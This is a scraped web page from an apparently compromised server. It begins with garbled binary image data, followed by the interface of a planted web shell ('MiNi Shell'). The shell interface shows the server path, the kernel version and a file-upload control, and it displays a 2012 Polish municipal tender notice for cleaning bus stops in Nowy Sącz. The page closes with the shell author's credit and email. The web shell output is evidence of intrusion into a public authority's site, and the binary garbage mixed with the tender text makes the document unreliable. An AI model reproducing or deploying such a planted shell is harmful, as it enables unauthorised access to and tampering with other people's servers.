JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121115/241667-N-2012.html

<p class="kh_header"><b>Nowy Sącz: UTRZYMANIE CZYSTOŚCI I PORZĄDKU NA PRZYSTANKACH KOMUNIKACYJNYCH NA TERENIE MIASTA NOWEGO SĄCZA W 2013  ROKU</b><br>
<b>Numer ogłoszenia: 241667 - 2012; data zamieszczenia: 15.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski  Zarząd Dróg , ul. Wyspiańskiego 22, 33-300 Nowy Sącz, woj. małopolskie, tel. 18-4427967, faks 18 4427800.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzd.nowysacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UTRZYMANIE CZYSTOŚCI I PORZĄDKU NA PRZYSTANKACH KOMUNIKACYJNYCH NA TERENIE MIASTA NOWEGO SĄCZA W 2013  ROKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Utrzymanie czystości i porządku na przystankach komunikacyjnych na terenie miasta Nowego Sącza 2013r.
Zakres prac:
I.   Zakres  A /.
Utrzymanie porządku i czystości na przystankach komunikacyjnych na terenie miasta Nowego Sącza tj. przystanków położonych przy drogach publicznych, których właścicielem lub zarządzającym jest miasto Nowy Sącz, położonych przy drogach publicznych - w okresie letnim :. 
od dnia 01 kwietnia 2013 r. do dnia 31 października 2013 r.
 tj. 
1. zamiatanie ręczne lub mechaniczne oraz zbieranie wszelkich nieczystości z terenu przystanków i zatok,
2. bieżące monitorowanie czystości i porządku przystanków oraz zatok oraz informowanie na bieżąco zamawiającego o zauważonych uszkodzeniach infrastruktury przystankowej oraz brakach w jej wyposażeniu i w przypadku zaistnienia uszkodzenia wiaty przystankowej wykonawca zobowiązany jest usunąć zniszczone elementy oraz oznakować i zabezpieczyć zniszczoną część przystanku przed dostępem osób trzecich,
3. opróżnianie i dezynfekcja koszy na śmieci, 
4. zbieranie i wywóz zebranych nieczystości do komunalnego wysypiska,
5.utrzymanie w czystości słupków z tablicami przystankowymi i wiat przystankowych poprzez ich mycie oraz mycie ławek, 
6.wywóz zebranych odpadów komunalnych na składowisko odpadów ,
7.utrzymywanie terenów zielonych poprzez cykliczne ich wykaszanie i utrzymywanie w należytym porządku, 
8.wykonywanie prac interwencyjnych zleconych przez Zamawiającego poza w/w ustalonymi wyżej wymaganiami Zamawiającego, 
9.1  Wykonawca będzie odpowiedzialny za ewentualne szkody wyrządzone osobom 
trzecim  powstałe  w trakcie wykonywania prac oraz Wykonawca na czas trwania umowy winien posiadać aktualną polisę lub inny dokument ubezpieczenia potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej  w zakresie prowadzonej działalności gospodarczej obejmującej przedmiot niniejszego zamówienia. 
9.2.Wykonawca ponosi odpowiedzialności za urządzenia, sprzęt, materiały itp. należące do Wykonawcy, a znajdujące się na terenie wykonywanych prac. 
9.3..Wykonawca przejmuje na siebie odpowiedzialność odszkodowawczą jaką inne podmioty mogą dochodzić od Zamawiającego z tytułu uszkodzenia ciała, zadośćuczynienia /szkód osobowych/, oraz szkód majątkowych jakie mogą wyniknąć z niewłaściwego utrzymania czystości i porządku (tj. w zakresie pełnego zakresu usług) przystanków autobusowych objętych niniejszą umową.
10.Wykonawca odpowiada wobec Zamawiającego za efekt - rezultat pracy a nie za ilość wykonanej pracy, stąd też Zamawiający nie ustala częstotliwości wykonywania poszczególnych czynności.
Zakres B /.
Utrzymanie porządku i czystości na przystankach komunikacyjnych na terenie miasta Nowego Sącza tj. przystanków położonych przy drogach publicznych, których właścicielem lub zarządzającym jest miasto Nowy Sącz, położonych przy drogach publicznych - w okresie zimowym tj
 - od dnia 01 stycznia 2013r. do dnia 31 marca 2013 r. 
 - od dnia 01 listopada 2013r. do dnia 31 grudnia 2013 r. 
tj.  
1. zamiatanie ręczne lub mechaniczne oraz zbieranie wszelkich nieczystości z terenu przystanków i zatok,
2.bieżące monitorowanie czystości i porządku przystanków oraz zatok oraz informowanie na bieżąco zamawiającego o zauważonych uszkodzeniach infrastruktury przystankowej oraz brakach w jej wyposażeniu i w przypadku zaistnienia uszkodzenia wiaty przystankowej wykonawca zobowiązany jest usunąć zniszczone elementy oraz oznakować i zabezpieczyć zniszczoną część przystanku przed dostępem osób trzecich,
3. opróżnianie i dezynfekcja koszy na śmieci, 
4. zbieranie i wywóz zebranych nieczystości do komunalnego wysypiska,
5.utrzymanie w czystości słupków z tablicami przystankowymi i wiat przystankowych poprzez ich mycie oraz mycie ławek, 
6.wywóz zebranych odpadów komunalnych na składowisko odpadów ,
7. odśnieżanie i likwidacja  śliskości na terenie przystanków - z użyciem  środków 
zgodnie z rozporządzeniem Ministra  Środowiska z dnia 27 października 2005 r.                   
w sprawie rodzajów i warunków stosowania środków, jakie mogą być używane na 
drogach publicznych oraz ulicach i placach (Dz. U.  z 2005 r. Nr 230, poz. 1960), 
usuwanie sopli oraz zgarnianie  śniegu z dachu wiaty przystankowej,
8. wywożenie  śniegu z terenu przystanku z częstotliwością zapewniającą estetyczny 
wygląd terenu przystanku i dla zapewnienia bezpieczeństwa pasażerów/osób  przebywających na tym terenie, 
9. wykonywanie innych prac interwencyjnych zleconych przez Zamawiającego poza  
w/w ustalonymi wyżej wymaganiami Zamawiającego, 
10/.1 Wykonawca będzie odpowiedzialny za ewentualne szkody wyrządzone osobom 
trzecim  powstałe  w trakcie wykonywania prac oraz Wykonawca na czas trwania umowy winien posiadać aktualną polisę lub inny dokument ubezpieczenia potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej  w zakresie prowadzonej działalności gospodarczej obejmującej przedmiot niniejszego zamówienia.
10./2.Wykonawca ponosi odpowiedzialności za urządzenia, sprzęt, materiały itp. należące do Wykonawcy, a znajdujące się na terenie wykonywanych prac.
11/.3 Wykonawca przejmuje na siebie odpowiedzialność odszkodowawczą jaką inne podmioty mogą dochodzić od Zamawiającego z tytułu uszkodzenia ciała, zadośćuczynienia /szkód osobowych/, oraz szkód majątkowych jakie mogą wyniknąć z niewłaściwego utrzymania czystości i porządku (tj. w zakresie pełnego zakresu usług) przystanków autobusowych objętych niniejszą umową.
12.Wykonawca odpowiada wobec Zamawiającego za efekt - rezultat pracy a nie za ilość wykonanej pracy, stąd też Zamawiający  nie ustala częstotliwości wykonywania poszczególnych czynności.
II. Teren przystanku stanowi:
a) zatoka przystankowa na całej długości oraz przyległy do niej chodnik oraz pas ziemny lub trawnik, 
b) w przypadku braku zatoki przystankowej, powierzchnia po 15 m w każdą stronę od znaku - słupka z tablicą przystanku lub wiaty przystankowej na całej szerokości ciągu pieszego. 
III. Wykonawca zadania/usługi zobowiązany jest  do współpracy ze służbami Zamawiającego w zakresie objętym przedmiotem umowy i obowiązany jest do monitorowania i niezwłocznie po stwierdzeniu nieprawidłowości, braków i zniszczeń  -zgłaszać Zamawiającemu wszelkie nieprawidłowości,braki,uszkodzenia:  przystanków/chodników,zatok,jezdni itp/ i w zakresie ich oznakowania oraz  stanu technicznego infrastruktury w obrębie przystanków komunikacyjnych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.51.13.00-5, 90.62.00.00-9, 90.63.00.00-2, 90.51.13.00-5, 90.51.32.00-8, 90.51.10.00-2, 50.76.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli  okres prowadzenia działalności jest krótszy - w tym okresie wykonał, a  w przypadku świadczeń okresowych lub ciągłych wykonuje minimum jedną usługę związaną z oczyszczaniem placów lub parkingów lub chodników lub ulic lub przystanków lub trawników. 
W   przypadku   składania   oferty   wspólnej   warunek zostanie uznany przez zamawiającego za  spełniony, jeżeli  wykonawcy składający ofertę wspólną będą spełniać go łącznie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek      ten     zostanie    spełniony,   jeżeli     wykonawca    jest     ubezpieczony   od odpowiedzialności    cywilnej    w    zakresie   prowadzonej    działalności    związanej z  przedmiotem zamówienia   na  kwotę:  co najmniej 50 000  zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany postanowień umowy mogą wynikać z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany wprowadzone zostaną 
po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzd.nowysacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg
Nowy Sącz
ul.Wyspiańskiego 22,III piętro,pokój nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2012 godzina 12:00, miejsce: Miejski Zarząd Dróg
Nowy Sącz
ul.Wyspiańskiego 22,III piętro,sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com